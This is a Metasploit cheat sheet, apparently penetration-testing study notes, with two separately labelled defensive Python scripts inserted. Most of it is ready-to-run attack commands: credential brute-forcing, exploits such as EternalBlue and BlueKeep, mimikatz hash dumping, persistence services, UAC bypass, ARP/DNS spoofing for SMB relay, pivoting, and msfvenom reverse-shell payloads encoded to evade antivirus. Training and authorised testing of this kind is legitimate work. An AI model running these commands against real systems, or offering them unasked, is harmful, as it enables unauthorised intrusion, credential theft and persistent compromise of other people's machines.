Tier III

Metasploit

Metasploit is the ultimate weapon in the hacker's arsenal: a powerful exploitation framework used to uncover, attack, and take over vulnerable systems. It's where automation meets offensive security, turning knowledge into action.


Auxiliary Modules


Auxiliary modules are used for scanning and enumeration (hosts, ports, services, network discovery, login checks) and similar tasks that do not deliver a payload.


Auxiliary - Apache Enumeration


Search for Auxiliary modules for Apache enumeration:
search apache_userdir_enum

Use the Auxiliary module for Apache enumeration:
use auxiliary/scanner/http/apache_userdir_enum

Set the list of common users from Metasploit framework list:
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt

Start Apache enumeration:
run


Auxiliary - FTP Anonymous Login


Search for Auxiliary FTP modules:
search type:auxiliary ftp

Use the anonymous FTP login module:
use auxiliary/scanner/ftp/anonymous

Show the available options for this module:
show options

Execute the anonymous login attempt:
run


Auxiliary - FTP Login Credentials Brute-Force


Search for Auxiliary FTP modules:
search type:auxiliary ftp

Use the FTP brute force module for login attempts:
use auxiliary/scanner/ftp/ftp_login

Set the target IP:
set RHOSTS target-ip

Set the user wordlist (Metasploit built-in):
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt

Set the password wordlist (Metasploit built-in):
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Perform the brute force attack to try to authenticate on the FTP port:
run


Auxiliary - FTP Version Scan


Search for Auxiliary FTP modules:
search type:auxiliary ftp

Use the FTP scanner that also searches for the version:
use auxiliary/scanner/ftp/ftp_version

Check the information of your scan. Ensure that the RPORT is set to 21 (default FTP port):
show options

Execute the FTP port version scan:
run


Auxiliary - HTTP Directory Scan Brute-Force


Search for Auxiliary modules for brute-force directory scan:
search dir_scanner

Use the Auxiliary module for brute-force directory scan:
use auxiliary/scanner/http/dir_scanner

Execute the brute-force for directory scan:
run


Auxiliary - HTTP File Scan Brute-Force


Search for Auxiliary modules for brute-force file scan:
search files_dir

Use the Auxiliary module for brute-force file scan:
use auxiliary/scanner/http/files_dir

Execute the brute-force on file scan:
run


Auxiliary - HTTP Web Application Scanning with WMAP


Load Wmap inside Metasploit framework:
load wmap

List every Wmap command:
wmap_

Add the target-ip to use:
wmap_sites -a target-ip

Add the target URL:
wmap_targets -t http://target-ip

You can list what you have added so far by passing -l to these commands (example: wmap_sites -l):
wmap_sites -l

Run Wmap to get all the auxiliary modules available for your target (it searches automatically):
wmap_run -t

Execute all the auxiliary modules that it has found:
wmap_run -e

Show every vulnerability that it has found:
wmap_vulns -l


Auxiliary - HTTP Login Credentials Brute-Force


Search for Auxiliary modules for brute-force login:
search http_login

Use the Auxiliary module for brute-force login:
use auxiliary/scanner/http/http_login

Set the URI of the protected folder you want to authenticate against:
set AUTH_URI target-folder

Set the user brute-force list from the Metasploit framework:
set USER_FILE /usr/share/metasploit-framework/data/wordlists/namelist.txt

Set the password brute-force list from the Metasploit framework:
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Show only the successful results:
set VERBOSE false

Execute the brute-force on login:
run


Auxiliary - HTTP robots.txt


Search for Auxiliary modules about robots.txt:
search robots_txt

Use the Auxiliary module for robots.txt file:
use auxiliary/scanner/http/robots_txt

Execute the robots.txt search:
run


Auxiliary - MySQL Enumeration


Search for the MySQL Enum Auxiliary module:
search mysql_enum

Use the Auxiliary module for MySQL enumeration (requires root credentials):
use auxiliary/admin/mysql/mysql_enum

Set the username (root):
set USERNAME root

Set the target password:
set PASSWORD target-password

Start MySQL enumeration:
run


Auxiliary - MySQL Execute SQL Commands


Search for the MySQL Auxiliary module:
search type:auxiliary mysql

Use the MySQL Auxiliary module for executing SQL queries on the target:
use auxiliary/admin/mysql/mysql_sql

Set the username to root:
set USERNAME root

Set the password for the target user:
set PASSWORD target-password

Set the SQL query to execute (example: show databases;):
set SQL "show databases;"

Run the SQL query:
run


Auxiliary - MySQL Login Credentials Brute-Force


Search for Auxiliary modules for MySQL login with brute-force:
search type:auxiliary mysql

Use the Auxiliary module for MySQL login with brute-force:
use auxiliary/scanner/mysql/mysql_login

Specify the root user for the brute-force attack:
set USERNAME root

Set the password list from the Metasploit framework:
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Display only successful credentials:
set VERBOSE false

Start the brute-force for credentials:
run


Auxiliary - MySQL Schema Dump


Search for Auxiliary modules for MySQL:
search type:auxiliary mysql

Use the Auxiliary module to dump the MySQL schema from the target:
use auxiliary/scanner/mysql/mysql_schemadump

Set the username to root:
set USERNAME root

Set the password for the target user:
set PASSWORD target-password

Run the module to execute the schema dump:
run


Auxiliary - MySQL Version Scan


Search for Auxiliary modules for MySQL version:
search type:auxiliary mysql

Use the Auxiliary module for MySQL version:
use auxiliary/scanner/mysql/mysql_version

Search for MySQL version:
run


Auxiliary - RDP Scanner


Search for the Auxiliary module to check if there is an RDP port on the target:
search rdp_scanner

Use the module:
use auxiliary/scanner/rdp/rdp_scanner

Set the target port (if RDP is not listening on the default 3389):
set RPORT 3333

Execute the module:
run


Auxiliary - SMB-Samba Login Credentials Brute-Force


Search for Auxiliary SMB modules:
search type:auxiliary smb

Use the module to brute-force login on SMB port:
use auxiliary/scanner/smb/smb_login

Set the user to try to login:
set SMBUser target-user

Use the built-in file with common passwords:
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Execute the SMB login brute-force attack:
run


Auxiliary - SMB-Samba Shares Enumeration


Search for Auxiliary SMB modules:
search type:auxiliary smb

Use the module to enumerate shares on SMB:
use auxiliary/scanner/smb/smb_enumshares

Enable a detailed description of what it finds:
set ShowFiles true

Execute the SMB shares enumeration:
run


Auxiliary - SMB-Samba Version Scan


Search for Auxiliary SMB modules:
search type:auxiliary smb

Use the SMB version scanner module:
use auxiliary/scanner/smb/smb_version

Execute the SMB version scan:
run


Auxiliary - SMB-Samba User Enumeration


Search for Auxiliary SMB modules:
search type:auxiliary smb

Use the module to enumerate users on SMB:
use auxiliary/scanner/smb/smb_enumusers

Execute the SMB user enumeration:
run


Auxiliary - SMB-Samba Windows EternalBlue


Use a module that checks whether the target OS version is vulnerable to the EternalBlue exploit (MS17-010):
use auxiliary/scanner/smb/smb_ms17_010

Run the check; it reports whether the target is vulnerable without exploiting it:
run


Auxiliary - SMTP Version and Enumeration


Search for Auxiliary modules for SMTP:
search type:auxiliary smtp

Use the Auxiliary module for SMTP version:
use auxiliary/scanner/smtp/smtp_version

Get the SMTP version:
run

Use the Auxiliary module for SMTP user enumeration:
use auxiliary/scanner/smtp/smtp_enum

Specify a different USER_FILE if necessary.
Perform user enumeration by trying each name in the list against the server:
run


Auxiliary - SSH Version Scan


Search for Auxiliary modules for SSH version:
search type:auxiliary ssh

Use the Auxiliary module to get the SSH version:
use auxiliary/scanner/ssh/ssh_version

Run the module to get the SSH version:
run


Auxiliary - SSH Login Credentials Brute-Force


Search for Auxiliary modules for SSH:
search type:auxiliary ssh

Use the Auxiliary module for SSH login with brute-force:
use auxiliary/scanner/ssh/ssh_login

Set the username file to use from the Metasploit framework:
set USER_FILE /usr/share/metasploit-framework/data/wordlists/namelist.txt

Set the password file to use from the Metasploit framework:
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Set verbose mode to false to display only successful credentials:
set VERBOSE false

Start the brute-force for credentials:
run
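Defender's counterpart to the ftp_login and ssh_login runs described above, as an added example that is not part of this cheat sheet: a Python detector that replays constructed sshd auth.log lines and flags a burst of failed logins from one source (what a USER_FILE/PASS_FILE run looks like from the target's side) and a successful login that follows such a burst (the single line that VERBOSE false would have shown the operator). The log lines, threshold and window are assumptions; the same windowing applies to FTP or SMB login logs with a different regex.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd log lines in traditional syslog format (not taken from a real
# host): one source runs through a user/password list and eventually hits.
SAMPLE_AUTH_LOG = """\
Mar 10 12:00:01 srv sshd[2001]: Failed password for invalid user admin from 10.0.0.5 port 50234 ssh2
Mar 10 12:00:02 srv sshd[2002]: Failed password for invalid user sysadmin from 10.0.0.5 port 50235 ssh2
Mar 10 12:00:02 srv sshd[2003]: Failed password for root from 10.0.0.5 port 50236 ssh2
Mar 10 12:00:03 srv sshd[2004]: Failed password for root from 10.0.0.5 port 50237 ssh2
Mar 10 12:00:04 srv sshd[2005]: Failed password for service from 10.0.0.5 port 50238 ssh2
Mar 10 12:00:05 srv sshd[2006]: Accepted password for service from 10.0.0.5 port 50239 ssh2
Mar 10 12:00:09 srv sshd[2007]: Failed password for alice from 192.168.1.20 port 41000 ssh2
Mar 10 12:00:30 srv sshd[2008]: Accepted publickey for alice from 192.168.1.20 port 41001 ssh2
"""

# Matches the "Failed/Accepted <method> for [invalid user] <user> from <ip>" lines
# sshd writes; other sshd lines (session opened, disconnects) are ignored.
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) \w+ for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)


def parse_line(line):
    """Return a dict with ts/result/user/ip for an auth line, or None."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    # syslog timestamps carry no year; fine for comparing events within one file
    ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
    return {"ts": ts, "result": m.group("result"), "user": m.group("user"), "ip": m.group("ip")}


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Sliding-window detector over auth log text.

    Emits ("burst", ip, failures) once a source reaches `threshold` failed
    logins inside `window_seconds`, and ("success_after_burst", ip, user) when
    a login then succeeds from a source that is still bursting, i.e. the guess
    that landed.
    """
    window = timedelta(seconds=window_seconds)
    failures = defaultdict(deque)   # ip -> timestamps of recent failures
    bursting = set()                # ips that already triggered a burst alert
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        q = failures[ev["ip"]]
        # age out failures that fell outside the window
        while q and ev["ts"] - q[0] > window:
            q.popleft()
        if not q:
            bursting.discard(ev["ip"])
        if ev["result"] == "Failed":
            q.append(ev["ts"])
            if len(q) >= threshold and ev["ip"] not in bursting:
                bursting.add(ev["ip"])
                alerts.append(("burst", ev["ip"], len(q)))
        elif ev["ip"] in bursting:
            alerts.append(("success_after_burst", ev["ip"], ev["user"]))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```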


Auxiliary - SSH User Enumeration


Search for Auxiliary modules for SSH:
search type:auxiliary ssh

Use the Auxiliary module for SSH user enumeration:
use auxiliary/scanner/ssh/ssh_enumusers

Set the username file to use from the Metasploit framework:
set USER_FILE /usr/share/metasploit-framework/data/wordlists/namelist.txt

Set the password file to use from the Metasploit framework:
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Perform users enumeration:
run


Auxiliary - TCP Port Scan


List every auxiliary module about port scanning:
search portscan

Use the Auxiliary module:
use auxiliary/scanner/portscan/tcp

Show options, in order to see if any value is missing:
show options

Execute the Auxiliary module:
run


Auxiliary - UDP Port Scan


Search for Auxiliary modules about UDP Scan:
search udp_sweep

Use the Auxiliary module:
use auxiliary/scanner/discovery/udp_sweep

Execute the Auxiliary module:
run


Auxiliary - Web Server Enumeration


Search for Auxiliary modules about HTTP:
search type:auxiliary http

Use the Auxiliary module for HTTP version scan:
use auxiliary/scanner/http/http_version

If your target uses HTTPS, set the port and enable SSL:
set RPORT 443
set SSL true
Execute the HTTP version scan:
run

Search for Auxiliary modules for HTTP headers:
search http_header

Use the Auxiliary module for HTTP header scan:
use auxiliary/scanner/http/http_header

Execute the HTTP header scan to discover technologies used:
run

Basic Commands

Put the session in the background (CTRL + Z), then search for a module that upgrades the shell to a Meterpreter session:
search shell_to_meterpreter

Use this module:
use post/multi/manage/shell_to_meterpreter

Set your ip:
set LHOST eth1

Set the session (that is in background):
set SESSION 1

Run the module:
run

Interact with the Meterpreter session that has been created:
sessions -i 2


DataBase commands


Check DB connection:
db_status

Import xml files:
db_import xmlfile-path


Dumping Hashes with Mimikatz and Kiwi (Windows)


Load kiwi from meterpreter:
load kiwi

Get the local account usernames and NTLM hashes from the SAM:
lsa_dump_sam

Create a Temp directory and move into it:
cd C:\\
mkdir Temp
cd Temp

Upload mimikatz from Kali:
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe

Execute mimikatz:
shell
.\mimikatz.exe

Use mimikatz to extract credentials:
lsadump::sam
lsadump::secrets
sekurlsa::logonpasswords


Establishing Persistence on Windows


Persistence techniques are used to maintain access to the target even across restarts or credential changes.

Search for a Windows persistence module:
search platform:windows persistence

Use the Windows local persistence service exploit:
use exploit/windows/local/persistence_service

Set the payload to a 64-bit Meterpreter reverse TCP shell:
set payload windows/x64/meterpreter/reverse_tcp

Select the active session (check your available sessions):
set SESSION 1

Run the exploit to establish persistence:
exploit

Optionally set a 32-bit Meterpreter payload:
set payload windows/meterpreter/reverse_tcp

Run the exploit again using the 32-bit payload:
exploit

Exploit Modules


Exploit modules in Metasploit are used to take advantage of vulnerabilities in systems or applications.
They allow attackers to gain unauthorized access or execute code on the target machine.


Exploit - (Apache) Tomcat Web Server


Search for available Tomcat exploit modules:
search type:exploit tomcat

Use the Tomcat JSP upload bypass exploit:
use exploit/multi/http/tomcat_jsp_upload_bypass

Set the desired Java payload:
set payload java/jsp_shell_bind_tcp

Specify the shell type:
set SHELL cmd

Execute the exploit:
run


Exploit - BlueKeep (Windows)


Search for BlueKeep exploit module:
search BlueKeep

Use the exploit module:
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

Check what Windows versions you can target:
show targets

Set the number of your target:
set target number

Check or set the CHUNK size (a value that is too high will crash the target system).

Run the exploit:
exploit


Exploit - PsExec Pass-the-Hash (Windows)


Use this after you have obtained the password hashes (for example with hashdump in Meterpreter) to perform a Pass-the-Hash attack.

Search for PsExec exploit module:
search psexec

Use the module:
use exploit/windows/smb/psexec

Get the port you are on:
sessions

Show options:
show options

Set a different LPORT (different from the one you found in the sessions):
set LPORT number

Set the SMBUser with the target username:
set SMBUser target-username

Set SMBPass to the target's hash in LM:NTLM format (the form the module expects for Pass-the-Hash):
set SMBPass target-LMhash:target-NTLMhash

Set the target to Native upload (to get a Meterpreter shell):
set target "Native upload"

Exploit the target:
exploit


Exploit - EternalBlue Windows


Search for eternalblue auxiliary and exploit modules:
search eternalblue

Use the exploit module:
use exploit/windows/smb/ms17_010_eternalblue

Show options:
show options

Run the exploit:
exploit


Exploit - FTP (Linux)


Search for ftp (in this example vsftpd):
search vsftpd

Use this module:
use exploit/unix/ftp/vsftpd_234_backdoor

Execute the exploit:
run


Exploit - Glassfish (Windows)


Use the Exploit module for Glassfish:
use exploit/multi/http/glassfish_deployer

Set the payload to work for the target OS (in this example Windows):
set payload windows/meterpreter/reverse_tcp

And check for any missing field that you require and try to set it:
show options

Run the exploit:
run


Exploit - Haraka (SMTP)


Scan target with nmap to detect service versions and OS:
db_nmap -sV -O target-ip

Search for exploit module related to Haraka:
search type:exploit name:haraka

Use the Haraka exploit module for Linux SMTP:
use exploit/linux/smtp/haraka

Set the server port to use:
set SRVPORT your-port

Set a valid email address:
set email_to your-email

Set the payload to linux/x64 meterpreter reverse HTTP:
set payload linux/x64/meterpreter_reverse_http

Set your local IP address:
set LHOST your-ip

Run the exploit:
run


Exploit - Incognito (Windows)


Find the process ID of explorer.exe so you can migrate your Meterpreter session into it:
pgrep explorer

Migrate to that process ID:
migrate explorer-pid

Get your current user account:
getuid

Get your current privileges:
getprivs

Load the Incognito module:
load incognito

Perform another exploit:
exploit

Load the Incognito module again:
load incognito

List your available tokens:
list_tokens -u

Impersonate the token you want (e.g., Administrator):
impersonate_token "ATTACKDEFENSE\Administrator"

Find the process ID of explorer.exe again so you can migrate your Meterpreter session into it:
pgrep explorer

Migrate to that process ID:
migrate explorer-pid

Get your current user account:
getuid

Get your current privileges: now you will have administrator privileges!
getprivs


Exploit - Kernel (Windows)


Use an exploit module:
use exploit/windows/local/ms16_014_wmi_recv_notif

Set the session of the Kernel (check your sessions):
set SESSION session-number

Set the port number (check your sessions):
set LPORT port-number

Start the exploit:
exploit


Exploit - (Linux) Vulnerable Program (Chkrootkit)


In the shell of an exploited target.
List all active processes; in this example a /bin/bash process running a script stands out:
ps aux

Check the content of that script; it is set up to execute chkrootkit (the Linux rootkit checker the author treats as an AV):
cat /bin/check-down

Check the version of chkrootkit; in this case it is < 0.5, so it has a known vulnerability:
chkrootkit -V

Put the session in the background (CTRL + Z).
Search for a module for chkrootkit:
search chkrootkit

Use this module:
use exploit/unix/local/chkrootkit

Set the meterpreter session (that is in background):
set SESSION 2

Set the path of chkrootkit:
set CHKROOTKIT /bin/chkrootkit

Set your ip:
set LHOST your-ip

Start the exploit:
exploit


Exploit - Rejetto (Windows)


Search for Rejetto HFS (the HTTP File Server exploited here as the foothold for the UAC section):
search rejetto

Use the exploit module:
use exploit/windows/http/rejetto_hfs_exec

Start the exploit:
exploit

Now you can continue with the Incognito module (see Exploit - Incognito (Windows)).


Exploit - Samba (Linux)


Search for exploit modules for samba:
search type:exploit name:samba

Use this module:
use exploit/linux/samba/is_known_pipename

Exploit it:
run


Exploit - ShellShock (Linux)


Search for the Auxiliary module to see if the target is vulnerable:
search shellshock

Use the Exploit module for ShellShock:
use multi/http/apache_mod_cgi_bash_env_exec

Set the target CGI that you have found in the previous method:
set TARGETURI target-cgi.cgi

Run the exploit:
exploit


Exploit - SMB - Samba with Psexec


Search for PsExec exploit modules:
search psexec

Use the exploit module:
use exploit/windows/smb/psexec

Set the target username:
set SMBUser target-username

Set the target password:
set SMBPass target-password

Configure a meterpreter for Windows x64 in this case:
set payload windows/x64/meterpreter/reverse_tcp

Perform the exploit:
exploit


Exploit - SMB - Samba with Socks


Search for SOCKS proxy module:
search socks

Use the auxiliary SOCKS proxy server module:
use auxiliary/server/socks_proxy

Set the SOCKS version:
set VERSION 4a

Set the server port:
set SRVPORT 9050

Start the SOCKS proxy:
exploit

On another terminal: perform a proxychains scan with Nmap:
proxychains nmap target-ip -sT -Pn -sV -p 445

On msfconsole: migrate the process to explorer.exe:
migrate -N explorer.exe

View network shares on the target:
net view \\target-ip


Exploit - SMB - Samba Relay Attack


Search for the SMB relay exploit module:
search smb_relay

Use the SMB relay exploit module:
use exploit/windows/smb/smb_relay

Set your IP as the server host:
set SRVHOST your-ip

Set your IP as LHOST:
set LHOST your-ip

Set the target IP:
set SMBHOST target-ip

Start the exploit:
exploit

In another shell: create a hosts file for DNS spoofing that maps the target's domain names to your IP:
echo "your-ip *.target-website.com" > dns

Start DNS spoofing:
dnsspoof -i eth1 -f dns

In another shell: enable IP forwarding so the spoofed traffic still reaches its destination:
echo 1 > /proc/sys/net/ipv4/ip_forward

Start ARP spoofing (tell the target that you are the gateway; gateway-ip is the gateway on the target's subnet, typically the .1 address):
arpspoof -i eth1 -t target-ip gateway-ip

In another shell: ARP spoofing in the other direction (tell the gateway that you are the target):
arpspoof -i eth1 -t gateway-ip target-ip

With this in place the target's DNS queries are answered by your machine, so its SMB connections are redirected to you and picked up by the relay module.


Exploit - SSH (Linux)


Search for this module:
search libssh_auth_bypass

Use this module:
use auxiliary/scanner/ssh/libssh_auth_bypass

Spawn a shell:
set SPAWN_PTY true

Start the exploit:
run


Exploit - UAC (Windows)


Set the target IP as a global variable:
setg RHOSTS target-ip

Search for Rejetto HFS (the HTTP File Server exploited here as the foothold for the UAC section):
search rejetto

Use the module:
use exploit/windows/http/rejetto_hfs_exec

Start the exploit:
exploit


Using UAC (Windows)


Create a payload called backdoor.exe:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=your-ip LPORT=1234 -f exe > backdoor.exe

Start PostgreSQL and the Metasploit framework:
service postgresql start && msfconsole

Use the handler module to catch the reverse connection from your payload:
use multi/handler

Set the payload we have to upload:
set payload windows/meterpreter/reverse_tcp

Set your IP:
set LHOST your-ip

Set the port you used when creating the payload:
set LPORT 1234

Start the listener and wait for the payload to connect back:
run


Upload Payload with UACMe


Clone the UACMe repository from GitHub and pick the .exe you need (in this example Akagi64.exe).

Move to the root of C: in your meterpreter session on the target system:
cd C:\\

Create a Temp folder (where we upload the payload and .exe file):
mkdir Temp

Move to the Temp folder:
cd Temp

Upload the payload we have created before:
upload backdoor.exe

Upload the UACMe file (specifying the correct path):
upload /root/Desktop/tools/UACME/Akagi64.exe

Use the shell:
shell

Execute the UACMe exe in order to use the payload with elevated privileges:
.\Akagi64.exe 23 C:\Temp\backdoor.exe


Exploit - WebDav (Windows) Automatic


Search for the module that will enable uploads on the target WebDav:
search iis upload

Use the module to upload .asp shell:
use exploit/windows/iis/iis_webdav_upload_asp

Set your IP for listening:
set LHOST your-ip

Set the port we have used for our shell:
set LPORT our-port

Set the username (that you got with brute-force for example):
set HttpUsername target-username

Set the password (that you got with brute-force for example):
set HttpPassword target-password

Set the endpoint of the WebDav and the name of your shell:
set PATH /webdav/shell.asp

Start the exploit:
exploit


Exploit - WebDav (Windows) Manual


Use Metasploit framework as a listener for the malicious shell that we have created with msfvenom:
use multi/handler

Set the payload the same as what we have used when we created the shell:
set payload windows/meterpreter/reverse_tcp

Set your IP for listening:
set LHOST your-ip

Set the port we have used for our shell:
set LPORT your-port

Run the listener for the reverse shell:
run


Exploit - WinRM (Windows)


Search for WinRM exploit module:
search winrm_script

Use the Exploit module:
use exploit/windows/winrm/winrm_script_exec

Set target IP:
set RHOSTS target-ip

Force the command to use a VBS script:
set FORCE_VBS true

Set the target username (administrator):
set USERNAME target-username

Set the target password:
set PASSWORD target-password

Start the exploit:
exploit


Exploit - Xoda (WebApp)


XODA is a web-based file manager written in PHP.
Search for the XODA module:
search Xoda

Use the exploit module for XODA:
use exploit/unix/webapp/xoda_file_upload

Show the options to configure:
show options

Set the url of the target (in this case it is in the root path, so / ):
set TARGETURI /

Run the exploitation on the target:
exploit

Settings


Global Variables


You can set global variables so you do not have to repeat them for each module.


Set the target ip and your ip:
setg RHOSTS target-ip
setg LHOST your-ip


Import Nessus results


Import the export of Nessus into Metasploit framework, after downloading the results from Nessus:
db_import path-of-nessus-file


Metasploit-Autopwn


Download the repo (or with git):
wget repo-link

Import this into Metasploit modules:
sudo mv db_autopwn.rb /usr/share/metasploit-framework/plugins

On Metasploit, load the module:
load db_autopwn

Automatically find exploit modules for your target port:
db_autopwn -p -t -PI target-port


Migrate Payload


Run this msfconsole command to migrate the Meterpreter session into another process, so the session survives if the exploited process exits:
run post/windows/manage/migrate


New workspace


Create a new workspace:
workspace -a name


Nmap commands


You can run Nmap directly from Metasploit.

Everything you gather with Nmap is saved in your Metasploit workspace.

db_nmap nmap-options target-ip


Pivoting


Pivoting is the technique of using a compromised host to attack other hosts on another (internal) network.

It is a strong technique because it lets you exploit hosts you could not reach otherwise: hosts on an internal network are normally unreachable from outside, but through the compromised host they become reachable.

After you have exploited the first target:
Route the internal network for pivoting:
run autoroute -s new-network/20

Search and use port scanning module:
search portscan

Use this TCP port scan module:
use auxiliary/scanner/portscan/tcp
set RHOSTS new-network

Perform the scan:
exploit

Forward local port to remote host port 80:
portfwd add -l 1234 -p 80 -r new-ip

Perform local Nmap scan against the forwarded port:
db_nmap -sS -sV -p 1234 localhost

After this you can find the vulnerability and exploit the new target, too!

Msfvenom


Msfvenom is a standalone payload generator. It is a combination of msfpayload and msfencode. It is fast and uses a single instance.


Msfvenom - Create a shell


Generate an ASP shell that you can upload to the target WebDAV (LHOST is your listening IP):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=your-ip LPORT=your-port -f asp > shell.asp


Msfvenom - Create a Payload


Create a 32-bit (x86) payload that connects back to your IP on a port you choose, in .exe format (-f):
msfvenom -a x86 -p msf-payload-path LHOST=your-ip LPORT=1234 -f exe > your-path.exe


Msfvenom - Encoding a Payload


Encoding modifies the payload's byte pattern (its signature) in an attempt to avoid antivirus detection.
Create an msfvenom payload with the specified encoder and 10 iterations (-i) to increase the chance of avoiding AV detection:
msfvenom -p msf-payload-path LHOST=your-ip LPORT=1234 -i 10 -e msf-encoder-path -f exe > your-path.exe


Msfvenom - List Payloads and Encoders


Show every available payload:
msfvenom --list payloads

Show every available encoder:
msfvenom --list encoders


Post-Exploit Modules


These modules are used after you have exploited a service or host.

They help you elevate privileges or perform other common post-exploitation tasks.


Post - Dumping Linux Hashes Passwords


Show the content of the shadow file:
cat /etc/shadow

Copy the hashed password (the $id$ prefix tells you which hash algorithm was used) and put the session in the background (CTRL + Z).
Search for the module:
search hashdump

Use this module:
use post/linux/gather/hashdump

Set the meterpreter session:
set SESSION 2

Run the module:
run


Post - Enabling RDP


Search for the module to enable RDP:
search enable_rdp

Use the post-exploitation module to enable RDP:
use post/windows/manage/enable_rdp

Select the active session:
set SESSION 1

Run the module to enable RDP:
exploit

Scan to confirm RDP (port 3389) is active:
db_nmap -sV -p 3389 target-ip

Reconnect to the session:
sessions -i 1

Open a shell on the target:
shell

View active users on the system:
net users

Change the Administrator password:
net user administrator new-password

Access RDP using the new credentials:
xfreerdp /u:administrator /p:new-password /v:target-ip


Post - Linux Post Exploitation Modules


Search for module to gather Linux system configuration:
search enum_config

Search for modules to enumerate environment variables:
search env platform:linux

Search for module to enumerate network protocols:
search enum_network

Search for module to detect system protections:
search enum_protections

Search for module to enumerate system info (like installed packages):
search enum_system

Check if the target is a Docker container:
search checkcontainer

Check if the target is a Virtual Machine:
search checkvm

Search for module to enumerate user history:
search enum_users_history


Post - Privilege Escalation (Windows)


Use the module:
use post/multi/recon/local_exploit_suggester

Execute the module:
run

After this you can try to perform Kernel exploitation, for example.

Scripts & Other Commands


Resource Scripts


Resource scripts let you automate repetitive tasks.
You load the script in Metasploit to execute the list of commands you need.


List all the pre-made Metasploit scripts you can use:
ls -al /usr/share/metasploit-framework/scripts/resource/


Resource Scripts - Create a script from Metasploit


Run the commands you want to record, for example:
use auxiliary/scanner/portscan/tcp
set RHOSTS target-ip
run
(..or any other command sequence..)

Interrupt the command with CTRL + C.
Create a resource script from the commands you have used in this msfconsole session:
makerc script-path


Resource Scripts - Execute a script with Metasploit


Execute a resource script (an .rc file: a list of msfconsole commands, optionally with embedded Ruby) with Metasploit:
msfconsole -r script.rc

You can do the same from msfconsole:
resource script-path


Search CVE Vulnerability


Search for a particular cve and target name:
search cve:target-cve name:target-name


Searching for Passwords in Windows Configuration Files


Create a payload named payload.exe:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=your-ip LPORT=1234 -f exe > payload.exe

Use the multi-handler module in Metasploit:
use multi/handler

Set the payload:
set payload windows/x64/meterpreter/reverse_tcp

Set the port used by your payload:
set LPORT 1234

Set your IP address:
set LHOST your-ip

Run the handler to wait for the reverse connection from the target:
run

Search for the file:
search -f Unattend.xml

Navigate to the directory:
cd C:\\
cd Windows
cd Panther
download Unattend.xml

Open the file and look for the stored administrator password (base64-encoded):
cat Unattend.xml

Create a new file and save the base64-encoded password in it:
vim password.txt

Decode the password:
base64 -d password.txt
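The Unattend.xml check above done as an audit script, added here as an example that is not part of the original cheat sheet. Windows Setup stores a non-plaintext answer-file password as base64 of the UTF-16LE password with the element name (Password or AdministratorPassword) appended, which is why a plain base64 -d shows the password followed by that suffix; the script parses a constructed Unattend.xml, decodes each credential and returns the findings so leftover answer files can be found and cleaned up. The answer file and its passwords are constructed sample data.

```python
import base64
import xml.etree.ElementTree as ET

# Answer-file elements that hold a credential. When <PlainText>false</PlainText>,
# Windows Setup stores base64( UTF-16LE( password + element name ) ), so the
# decoded text ends in "Password" or "AdministratorPassword".
CREDENTIAL_ELEMENTS = ("AdministratorPassword", "Password")


def local_name(tag):
    """Drop the {urn:schemas-microsoft-com:unattend} prefix ElementTree adds."""
    return tag.rsplit("}", 1)[-1]


def child_text(elem, name):
    """Text of the first child called `name` (namespace-agnostic), or ''."""
    for child in elem:
        if local_name(child.tag) == name:
            return (child.text or "").strip()
    return ""


def encode_unattend_password(password, element_name):
    """Reproduce the obfuscation Setup applies; used here to build the sample."""
    return base64.b64encode((password + element_name).encode("utf-16-le")).decode("ascii")


def decode_unattend_password(value, element_name):
    """Reverse encode_unattend_password; tolerates a value without the suffix."""
    text = base64.b64decode(value).decode("utf-16-le")
    if text.endswith(element_name):
        text = text[: -len(element_name)]
    return text


def find_credentials(xml_text):
    """Return [(element_name, password)] for every credential that is actually set."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        name = local_name(elem.tag)
        if name not in CREDENTIAL_ELEMENTS:
            continue
        value = child_text(elem, "Value")
        if not value:
            continue  # empty <Value/> means no password was written
        plain = child_text(elem, "PlainText").lower() == "true"
        password = value if plain else decode_unattend_password(value, name)
        findings.append((name, password))
    return findings


# Constructed answer file (not from a real host): an AutoLogon password, the
# built-in Administrator password, and a local account whose password is empty.
SAMPLE_UNATTEND = f"""<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Username>Administrator</Username>
        <Enabled>true</Enabled>
        <Password>
          <Value>{encode_unattend_password('AutoLogon1!', 'Password')}</Value>
          <PlainText>false</PlainText>
        </Password>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>{encode_unattend_password('P@ssw0rd', 'AdministratorPassword')}</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
        <LocalAccounts>
          <LocalAccount>
            <Name>svc_backup</Name>
            <Password>
              <Value></Value>
              <PlainText>false</PlainText>
            </Password>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""


if __name__ == "__main__":
    for element, password in find_credentials(SAMPLE_UNATTEND):
        print(f"{element}: {password}")
```

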